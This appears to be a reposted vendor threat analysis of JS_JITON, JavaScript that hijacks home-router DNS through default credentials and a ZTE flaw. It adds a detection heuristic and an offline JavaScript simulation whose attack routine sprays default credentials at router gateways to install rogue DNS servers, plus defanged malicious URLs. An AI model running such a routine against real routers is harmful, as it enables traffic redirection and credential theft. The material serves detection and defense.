Attacks against home routers have been going around for years—from malware that rigs routers to DNS rebinding attacks and backdoors, among others. Just last year one of our researchers reported Domain Name System (DNS) changer malware that redirected users to malicious pages when they visited specific websites. This let cybercriminals get hold of victims' online credentials, such as passwords and PINs.
We recently came across an attack that shows how the Internet of Things (IoT) can be an entry point for cybercriminal activity. The attack, which has been going on since December 2015, requires users to visit compromised websites hosting the malicious JavaScript from their mobile devices. When the sites are accessed from a mobile device, the JavaScript downloads a second JavaScript that carries the DNS-changing routine.
Detected as JS_JITON, this JavaScript is downloaded whether users access the compromised websites from a computer or a mobile device; the infection chain, however, differs by device type. JS_JITON downloads JS_JITONDNS, which only runs on mobile devices and triggers the DNS-changing routine. JITON only exploits the vulnerability (CVE-2014-2321, discussed below) if the affected user has a ZTE modem.
Figure 1: The number of detections for JS_JITON (Jan 5, 2016 – April 4, 2016)
Figure 2: Malicious obfuscated JavaScript hosted on legitimate websites
Looking through the code, we found mentions of well-known router manufacturers: D-Link, TP-LINK, and ZTE. TP-LINK accounted for 28% of router sales, making it the top router manufacturer for Q1 2015. D-Link is also in the top 10 with a 7% market share. Given that these brands have significant market share globally, it is no surprise that cybercriminals target them.
Although the attack used compromised websites in certain countries in Asia and in Russia, it affected users in various countries worldwide. Based on our Smart Protection Network data, the top affected countries are Taiwan, Japan, China, the United States, and France. D-Link and TP-Link are Taiwanese and Chinese brands respectively, which may account for the high share of affected users in those countries.
Figure 3: Top 10 countries affected by JS_JITON in the past 3 months
The cybercriminals behind this incident use evasion techniques to stay off the radar and keep the attack running without rousing suspicion among affected users. These include regularly updating the JavaScript code to fix errors and constantly changing the targeted home routers. The compromised websites are difficult to pinpoint because they show no other suspicious behavior. During our investigation we also observed a keylogging function that let the threat capture text typed into specific sites; as of this writing, that function has been removed.
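Because the hosting sites otherwise look normal, the practical way to find scripts like this is to triage the JavaScript itself. The following is an added example, not code from the write-up or from Trend Micro: a Node.js heuristic that scores indicators a router DNS changer has to carry somewhere in the clear (private gateway addresses, user:password pairs, DNS parameter names, router vendor names, and a mobile-only user-agent gate) and runs it over two constructed samples. The regexes, weights, thresholds and both samples are assumptions; since JS_JITON is obfuscated, this is meant for the deobfuscated second-stage script.

```javascript
// Added example (not from the write-up): static triage of a JavaScript file for
// the indicators of a router DNS changer. Regexes, weights and samples are
// assumptions, not details of JS_JITON itself.

const GATEWAY_RE =
  /\b(?:192\.168\.\d{1,3}\.\d{1,3}|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3})\b/g;
// "admin:admin" style string literals, or credentials in a URL userinfo part (//user:pass@host)
const CRED_PAIR_RE =
  /["']([A-Za-z0-9_]{1,32}):([A-Za-z0-9_!@#$%^&*.-]{0,32})["']|\/\/([A-Za-z0-9_]{1,32}):([^@\s"']{1,32})@/g;
const DNS_PARAM_RE = /\b(?:dns1|dns2|dnsserver|primary_dns|secondary_dns|wan_dns)\b/gi;
const VENDOR_RE = /\b(?:tp-?link|d-?link|zte)\b/gi;
// A user-agent check followed (within 200 chars) by a mobile platform name.
const MOBILE_GATE_RE = /userAgent[\s\S]{0,200}?(?:Android|iPhone|iPad|Mobile)/;

function countMatches(re, text) {
  return (text.match(re) || []).length;
}

// Returns { score, suspicious, indicators } for one script's source text.
function triageScript(source) {
  const indicators = {
    gatewayAddresses: new Set(source.match(GATEWAY_RE) || []).size,
    credentialPairs: countMatches(CRED_PAIR_RE, source),
    dnsParameters: countMatches(DNS_PARAM_RE, source),
    vendorNames: countMatches(VENDOR_RE, source),
    mobileOnlyGate: MOBILE_GATE_RE.test(source),
  };
  // No single indicator is damning (tag loaders sniff user agents too);
  // the combination of a LAN gateway, a credential list and DNS parameters is.
  let score = 0;
  if (indicators.gatewayAddresses > 0) score += 2;
  if (indicators.credentialPairs >= 5) score += 3;
  if (indicators.dnsParameters > 0) score += 2;
  if (indicators.vendorNames > 0) score += 1;
  if (indicators.mobileOnlyGate) score += 1;
  return { score, suspicious: score >= 5, indicators };
}

// Constructed sample in the shape the write-up describes (the real script is
// obfuscated and carries over 1,400 credential pairs; this is a stand-in).
const SAMPLE_DNS_CHANGER = [
  'var ua = navigator.userAgent;',
  'if (!/Android|iPhone/.test(ua)) { /* desktop: stay dormant */ }',
  'var gw = ["192.168.1.1", "192.168.0.1"];',
  'var creds = ["admin:admin", "admin:1234", "admin:password", "user:user", "admin:", "root:root"];',
  '// builds http://admin:admin@192.168.1.1/apply.cgi?dns1=203.0.113.53&dns2=203.0.113.54',
  'var brand = "tplink";',
].join("\n");

// Constructed benign sample: an ordinary tag loader that also sniffs the user agent.
const SAMPLE_TAG_LOADER = [
  'var mobile = navigator.userAgent.indexOf("Mobile") >= 0;',
  'var s = document.createElement("script");',
  's.src = "https://stats.example/tag.js?m=" + (mobile ? 1 : 0);',
  'document.head.appendChild(s);',
].join("\n");

if (typeof require !== "undefined" && require.main === module) {
  console.log("dns changer:", JSON.stringify(triageScript(SAMPLE_DNS_CHANGER)));
  console.log("tag loader: ", JSON.stringify(triageScript(SAMPLE_TAG_LOADER)));
}
```

Run it over the second-stage script after deobfuscation; on the constructed DNS-changer sample every indicator fires and the verdict is suspicious, while the tag loader only trips the user-agent indicator and stays below the threshold.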
Digging through the code
These malicious JavaScripts contain more than 1,400 username and password combinations. Using these lists of commonly used credentials, the script can overwrite the DNS settings of home routers. Most of the lists, however, have been commented out, so those parts do not run; the set of routers that can actually be affected may therefore be limited. Certain scripts also contain code that overwrites DNS settings through CVE-2014-2321, a vulnerability in ZTE modems. When successfully exploited, it lets attackers remotely execute arbitrary commands with administrator privileges.
Note that these DNS settings can only be overwritten when users access the compromised websites from their mobile devices. Aside from this, the code is commented out and does not run properly when executed. We do not know exactly why such features were added in the first place, but we can surmise that it is due to the proliferation and increased use of mobile devices. It is also possible that these features are being used for testing, since the scripts are updated regularly.
Figure 4: The list of log-in IDs and passwords
Figure 5: Part of the scripts that modify the DNS settings via CVE-2014-2321 vulnerability
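To make concrete why a credential list embedded in a web page is enough to change a router's DNS, here is an added example in JavaScript that is not from the write-up and not any vendor's code. It models both halves: the in-browser routine iterates default credentials against the LAN gateway, gated to mobile user agents as JITON is, and the router's set-DNS handler is shown twice, once accepting any authenticated request (which is what makes the attack work) and once requiring a same-origin POST with a per-session token. The endpoint shape, parameter names, addresses, credential list and the hardened design are assumptions for illustration; CVE-2014-2321 is not modelled.

```javascript
// Added example (not from the write-up or any vendor): a model of a DNS
// changer driven from a web page and of the router handler it targets.
// Endpoint, parameters, addresses and credentials are assumptions.

// --- Router side -----------------------------------------------------------
function makeRouter({ username, password, hardened }) {
  const LAN_ORIGIN = "http://192.168.1.1";
  const state = { dns: ["198.51.100.1"] };          // ISP resolver (constructed)
  const token = "csrf-" + Math.random().toString(36).slice(2);

  // req: { method, auth: {user, pass} | null, origin: string | null,
  //        csrf?: string, query: { dns1, dns2 } }
  function handleSetDns(req) {
    if (hardened) {
      // Checked before the password so a forged request cannot even probe
      // credentials: a cross-site request arrives as GET (img/iframe) or with
      // the other site's Origin, and never knows this session's token.
      if (req.method !== "POST" || req.origin !== LAN_ORIGIN || req.csrf !== token) {
        return { status: 403 };
      }
    }
    if (!req.auth || req.auth.user !== username || req.auth.pass !== password) {
      return { status: 401 };
    }
    state.dns = [req.query.dns1, req.query.dns2].filter(Boolean);
    return { status: 200 };
  }
  return { state, token, handleSetDns };
}

// --- Attacker side (the in-browser routine) --------------------------------
const GATEWAYS = ["192.168.0.1", "192.168.1.1"];
// Constructed list; JS_JITON carries more than 1,400 such pairs.
const CREDENTIALS = [["admin", "admin"], ["admin", "1234"], ["admin", "password"], ["user", "user"]];
const ROGUE_DNS = ["203.0.113.53", "203.0.113.54"];  // attacker resolvers (documentation range)

function isMobile(userAgent) {
  return /Android|iPhone|iPad/.test(userAgent);
}

// `send(gateway, req)` stands in for the browser issuing the request (credentials
// in the URL or an Authorization header) so the example runs offline.
function dnsChanger(userAgent, send) {
  if (!isMobile(userAgent)) return null;            // mobile-only gate, as in JITON
  for (const gateway of GATEWAYS) {
    for (const [user, pass] of CREDENTIALS) {
      const res = send(gateway, {
        method: "GET",                               // forged from a third-party page
        auth: { user, pass },
        origin: "http://compromised-site.example",
        query: { dns1: ROGUE_DNS[0], dns2: ROGUE_DNS[1] },
      });
      if (res.status === 200) return { gateway, user, pass };
    }
  }
  return null;
}

// Victim on home Wi-Fi: phone whose gateway is 192.168.1.1 with admin/1234 (constructed).
function simulateVisit({ hardened, userAgent }) {
  const router = makeRouter({ username: "admin", password: "1234", hardened });
  const lan = { "192.168.1.1": router };
  const send = (gateway, req) =>
    gateway in lan ? lan[gateway].handleSetDns(req) : { status: 0 }; // nothing at 192.168.0.1
  const hit = dnsChanger(userAgent, send);
  return { hit, dns: router.state.dns, router };
}

// What a legitimate admin session looks like against the hardened router.
function legitimateChange(router, dns1) {
  return router.handleSetDns({
    method: "POST",
    auth: { user: "admin", pass: "1234" },
    origin: "http://192.168.1.1",
    csrf: router.token,
    query: { dns1, dns2: "" },
  });
}

const ANDROID_UA = "Mozilla/5.0 (Linux; Android 6.0; Nexus 5) AppleWebKit/537.36 Mobile Safari/537.36";
const DESKTOP_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/49.0";

if (typeof require !== "undefined" && require.main === module) {
  console.log("unhardened:", simulateVisit({ hardened: false, userAgent: ANDROID_UA }).dns);
  console.log("hardened:  ", simulateVisit({ hardened: true, userAgent: ANDROID_UA }).dns);
}
```

Against the unhardened handler the second credential pair succeeds and the router's resolvers become the attacker's; the hardened handler refuses every forged request before looking at the password, so the list tells the attacker nothing, while a same-origin POST carrying the token still works. Rotating default credentials (the page's second recommendation) defeats the list; the origin and token checks are what defeat the technique.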
Awareness is key in the age of digitalization
Threats against home routers will likely proliferate, especially as more devices become connected. Although IoT has benefits, it also introduces security and privacy risks for home router users. In this case, we saw how attackers leveraged security gaps that can lead to information theft.
Users can arm themselves against such risks by taking the following security measures:
- Keep firmware, including router firmware, up to date with the latest patches
- Avoid using default IDs and passwords
People often overlook the importance of keeping firmware updated. Administrative devices, especially in the age of IoT, are vulnerable to attacks that may put both user privacy and security at risk. It is best to know how these smart devices operate and what kind of personally identifiable information they may collect. Knowing how secure smart devices are, and the security risks that using them may entail, is one of the ways to protect yourself and your data against threats like JITON.
Trend Micro endpoint solutions such as Trend Micro Security, Smart Protection Suites, and Worry-Free Business Security can protect users and businesses from this threat by blocking all related malicious URLs and detecting the malicious files. Trend Micro Mobile Security Personal Edition and Mobile Security Solutions also block all related malicious URLs used in this attack.
Indicators of Compromise
Type | Indicator |
--- | --- |
JS_JITON SHA1 | 4b75a94613b7bf238948104092fe9fd4107fbf97 |
JS_JITON SHA1 | da19d2b503932bfb7b0ccf6c40b9f0b0d19282fb |
JS_JITON SHA1 | f7d9dbc1c198de25512cb15f3c19827a2b2188df |
JS_JITON SHA1 | 545c71b9988d6df27eae31e8738f28da7caae534 |
JS_JITON SHA1 | 67c28c29ebef9a57657e84dce83d458225447ae9 |
JS_JITON SHA1 | 1f6e45204a28d9da16777d772eddf7e8d10e588a |
JS_JITON SHA1 | 331441f69ceae4d9f3a78f4b4b46bdc64c11bd4a |
JS_JITON SHA1 | 2f48f1c75f0984d722395b47cd10af9c15ea142f |
JS_JITON SHA1 | b6c423ff0c91fa65b63a37a136ca6bbe29fce34d |
JS_JITON SHA1 | 9d37dcf8f87479545adf78d44ca97464491fe39a |
JS_JITON SHA1 | af3ececf550f9486d90fca6f7bb7c735318d50cd |
JS_JITON SHA1 | ce034e437b20dce84e75a90ed2b3a58532ebcbb9 |
JS_JITON SHA1 | acb1f8caa3d2babe37ea21014e0c79ce6c18f8a2 |
JS_JITON SHA1 | b62ea64db9643fe0a4331f724d234e19c149cabf |
Malicious website | hxxp://lib[.]tongjii[.]us/tj[.]js |
Malicious website | hxxp://lib[.]tongjii[.]us/tongji[.]js |
Malicious website | hxxp://cn[.]tongjii[.]us/show[.]js |
Malicious website | hxxp://cn[.]tongjii[.]us/show1[.]js |
Malicious website | hxxp://dns[.]tongjj[.]info/dns/dlink[.]js |
Malicious website | hxxp://dns[.]tongjj[.]info/dns/tplink[.]js |
Malicious website | hxxp://dns[.]tongjj[.]info/dns/zte[.]js |
Malicious website | hxxp://dns[.]tongjj[.]info/dns/china/dlink[.]js |
Malicious website | hxxp://dns[.]tongjj[.]info/dns/china/tplink[.]js |
Malicious website | hxxp://dns[.]tongjj[.]info/dns/china/zte[.]js |
Source: https://blog.trendmicro.com/
Working as a cyber security solutions architect, Alisa focuses on application and network security. Before joining us she held cyber security researcher positions at a variety of cyber security start-ups. She also has experience in different industry domains such as finance, healthcare and consumer products.